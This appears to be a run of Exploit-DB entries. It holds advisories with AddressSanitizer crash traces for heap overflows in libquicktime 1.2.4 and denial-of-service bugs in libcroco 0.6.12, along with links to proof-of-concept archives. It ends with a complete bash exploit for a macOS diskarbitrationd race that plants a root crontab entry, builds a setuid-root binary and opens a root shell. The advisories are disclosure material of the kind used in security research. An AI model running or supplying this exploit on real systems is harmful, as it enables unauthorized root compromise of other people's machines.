Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==41642==ABORTING
POC:
libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4
CVE:
CVE-2017-9127
###################################
7.
the quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.
./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
=================================================================
==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008
READ of size 4 at 0x602000009d00 thread T0
#0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998
#1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633
#2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891
#3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
#4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
#5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
#6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
#7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
#8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)
allocated by thread T0 here:
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
#1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width
Shadow bytes around the buggy address:
0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04
=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
ASan internal: fe
==10979==ABORTING
POC:
libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
CVE:
CVE-2017-9128
=================================
qflb.wu () dbappsecurity com cn
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42148.zip
libcroco multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
Libcroco is a standalone css2 parsing and manipulation library.
The parser provides a low level event driven SAC like api and a css object model like api.
Libcroco provides a CSS2 selection engine and an experimental xml/css rendering engine.
Affected version:
=====
0.6.12
Vulnerability Description:
==========================
1.
the cr_tknzr_parse_comment function in cr-tknzr.c in libcroco 0.6.12 can cause a denial of service (memory allocation error) via a crafted CSS file.
./csslint-0.6 --dump-location libcroco_0_6_12_memory_allocation_error.css
==21841==ERROR: AddressSanitizer failed to allocate 0x20002000 (536879104) bytes of LargeMmapAllocator: 12
...
==21841==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
...
#10 0x7fd78c2fcb4d in cr_tknzr_parse_comment /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:462
#11 0x7fd78c2fcb4d in cr_tknzr_get_next_token /home/a/Downloads/libcroco-0.6.12/src/cr-tknzr.c:2218
#12 0x7fd78c356f6e in cr_parser_try_to_skip_spaces_and_comments /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:634
#13 0x7fd78c368a43 in cr_parser_parse_stylesheet /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:2538
#14 0x7fd78c368a43 in cr_parser_parse /home/a/Downloads/libcroco-0.6.12/src/cr-parser.c:4381
#15 0x480a8e in sac_parse_and_display_locations /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:960
#16 0x480a8e in main /home/a/Downloads/libcroco-0.6.12/csslint/csslint.c:1001
#17 0x7fd78b397f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#18 0x47c95c in _start (/home/a/Downloads/libcroco-0.6.12/csslint/.libs/lt-csslint-0.6+0x47c95c)
Reproducer:
libcroco_0_6_12_memory_allocation_error.css
CVE:
CVE-2017-8834
2.
The cr_parser_parse_selector_core function in cr-parser.c in libcroco 0.6.12 can cause a denial of service(infinite loop and CPU consumption) via a crafted CSS file.
./csslint-0.6 --dump-location libcroco_0_6_12_infinite_loop.css
Reproducer:
libcroco_0_6_12_infinite_loop.css
CVE:
CVE-2017-8871
===============================
qflb.wu () dbappsecurity com cn
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42147.zip
#!/bin/bash
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
if ! security authorize system.volume.internal.mount &>/dev/null; then
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
exit 1
fi
TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
assert(argc == 2);
setuid(0);
setgid(0);
system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1
race_link() {
mkdir -p mounts
while true; do
ln -snf mounts link
ln -snf $TARGET link
done
}
race_mount() {
while ! df -h | grep $TARGET >/dev/null; do
while df -h | grep $DISK >/dev/null; do
diskutil umount $DISK &>/dev/null
done
while ! df -h | grep $DISK >/dev/null; do
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
done
done
}
cleanup() {
echo "Killing child process $PID and cleaning up tmp dir"
kill -9 $PID
rm -rf $TMPDIR
}
if df -h | grep $DISK >/dev/null; then
echo 2>&1 "$DISK already mounted. Exiting."
exit 1
fi
race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root
while ! [ -e $TMPDIR/boom ]; do
sleep 1
done
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"